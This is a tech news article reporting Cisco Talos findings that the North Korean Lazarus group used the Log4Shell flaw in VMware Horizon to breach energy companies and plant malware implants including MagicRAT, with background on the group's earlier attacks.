Lazarus hackers are using Log4j to hack US energy companies

Ever-popular zero-day vulnerability rears its head again

When you purchase through links on our site, we may earn an affiliate commission.Here’s how it works.

Energy providers from around the world, including the United States, Canada, and Japan, have reportedly been targeted by state-sponsored North Korean hacker group Lazarus, also known as APT38.

According toCisco’s Talos Intelligence group, the campaign intends to infiltrate organizations around the world in the interests of establishing long-term access and subsequently exfiltrating data of interest to the nation-state.

Although the precise targets have remained unnamed, the attacks once again show the threat that North Korea and Lazarus can pose via destabilization efforts.

How did the attack work?

According to Talos, this campaign involved the exploitation of vulnerabilities in the VMWare Horizon virtual desktop product to gain an initial foothold in targeted organizations.

After gaining successful entry into the targeted enterprise networks, the group then deployed custom malware implants including the HTML bots VSingle and YamaBot.

In addition to these known malware families, they also claimed to discover the use of a previously unknown malware implant called “MagicRAT.”

Inital entry in the organizations was reportedly made using Log4Shell (CVE-2021-44228), a zero-day vulnerability in Log4j, a popular Java logging framework, which involves arbitrary code execution.

Are you a pro? Subscribe to our newsletter

Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!

Cybersecurity company Tenable has previously dubbed Log4Shell “the single biggest, most critical vulnerability ever”.

Google says it stopped North Korea hacking Chrome

Multiple retailers hit by new North Korea cyberattack

Our guide to the best firewalls

This wouldn’t be the first time North Korea has been implicated in attacks on foreign powers; security researchers at Kaspersky Lab have linked North Korea to the Wannacry ransomware attack which disable 300,000 computers in 150 countries and caused the UK’s NHS unprecedented issues.

Since it was founded in 2010, the Lazarus group has certainly been keeping busy if nothing else. Lately, it’s been turning its attention towards the world of blockchains and DeFi.

Lazarus was linked to an attack on the Ronin sidechain worth $615 million,  which powers the popular blockchain-integrated game Axie Infinity, which is known as one of the largest DefI hacks to date.

Will McCurdy has been writing about technology for over five years. He has a wide range of specialities including cybersecurity, fintech, cryptocurrencies, blockchain, cloud computing, payments, artificial intelligence, retail technology, and venture capital investment. He has previously written for AltFi, FStech, Retail Systems, and National Technology News and is an experienced podcast and webinar host, as well as an avid long-form feature writer.

This new phishing strategy utilizes GitHub comments to distribute malware

Should your VPN always be on?

Phishing attacks surge in 2024 as cybercriminals adopt AI tools and multi-channel tactics